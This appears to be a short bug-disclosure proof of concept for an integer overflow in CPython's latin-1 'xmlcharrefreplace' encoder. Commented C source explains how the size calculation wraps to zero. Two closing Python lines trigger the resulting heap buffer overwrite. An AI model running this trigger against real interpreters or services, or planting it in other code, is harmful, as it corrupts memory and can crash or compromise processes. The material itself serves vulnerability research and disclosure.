# static PyObject *
# unicode_encode_ucs1(PyObject *unicode,
#                     const char *errors,
#                     unsigned int limit)
# {
#     ...
#     while (pos < size) {
#       ...
#             case 4: /* xmlcharrefreplace */
#                 /* determine replacement size */
#                 for (i = collstart, repsize = 0; i < collend; ++i) {
#                     Py_UCS4 ch = PyUnicode_READ(kind, data, i);
#                     ...
#                     else if (ch < 100000)
# 1                       repsize += 2+5+1;
#                     ...
#                 }
# 2               requiredsize = respos+repsize+(size-collend);
#                 if (requiredsize > ressize) {
#                     ...
#                     if (_PyBytes_Resize(&res, requiredsize))
#                     ...
#                 }
#                 /* generate replacement */
#                 for (i = collstart; i < collend; ++i) {
# 3                   str += sprintf(str, "&#%d;", PyUnicode_READ(kind, data, i)); 
#                 }
# 
# 1. ch=0xffff<100000, so repsize = (number of unicode chars in string)*8
#    =2^29*2^3=2^32 == 0 (mod 2^32)
# 2. respos==0, collend==0, so requiredsize=repsize==0, so the destination buffer
#    isn't resized
# 3. overwrite
# 
# POC:

s = "\uffff"*(2**29)
s.encode("latin1", errors="xmlcharrefreplace")